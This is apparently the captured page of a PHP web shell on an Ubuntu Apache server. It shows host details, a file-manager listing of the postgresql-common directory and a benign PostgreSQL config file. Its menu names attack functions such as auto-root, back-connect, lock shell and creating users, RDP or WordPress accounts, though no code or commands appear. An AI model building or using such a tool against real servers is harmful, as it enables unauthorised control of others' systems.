Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
postgresql-common /
[ HOME SHELL ]
Name
Size
Permission
Action
pgdg
[ DIR ]
drwxr-xr-x
server
[ DIR ]
drwxr-xr-x
t
[ DIR ]
drwxr-xr-x
upgrade-scripts
[ DIR ]
drwxr-xr-x
createcluster.conf
1.29
KB
-rw-r--r--
init.d-functions
3.34
KB
-rw-r--r--
maintscripts-functions
10.08
KB
-rw-r--r--
pg_checksystem
1.82
KB
-rwxr-xr-x
pg_getwal
1.66
KB
-rwxr-xr-x
pg_updateaptconfig
1.03
KB
-rwxr-xr-x
pg_wrapper
9.21
KB
-rwxr-xr-x
pgcommon.sh
1.69
KB
-rw-r--r--
run-upgrade-scripts
3.62
KB
-rwxr-xr-x
supported-versions
6.12
KB
-rwxr-xr-x
testsuite
6.5
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : createcluster.conf
# Default values for pg_createcluster(8) # Occurrences of '%v' are replaced by the major version number, # and '%c' by the cluster name. Use '%%' for a literal '%'. # Create a "main" cluster when a new postgresql-x.y server package is installed #create_main_cluster = true # Default start.conf value, must be one of "auto", "manual", and "disabled". # See pg_createcluster(8) for more documentation. #start_conf = 'auto' # Default data directory. #data_directory = '/var/lib/postgresql/%v/%c' # Default directory for transaction logs # Unset by default, i.e. transaction logs remain in the data directory. #waldir = '/var/lib/postgresql/wal/%v/%c/pg_wal' # Options to pass to initdb. #initdb_options = '' # The following options are copied into the new cluster's postgresql.conf: # Enable SSL by default (using the "snakeoil" certificates installed by the # ssl-cert package, unless configured otherwise here) ssl = on # Show cluster name in process title cluster_name = '%v/%c' # Put stats_temp_directory on tmpfs stats_temp_directory = '/var/run/postgresql/%v-%c.pg_stat_tmp' # Add prefix to log lines log_line_prefix = '%%m [%%p] %%q%%u@%%d ' # Add "include_dir" in postgresql.conf add_include_dir = 'conf.d' # Directory for additional createcluster config include_dir '/etc/postgresql-common/createcluster.d'
Close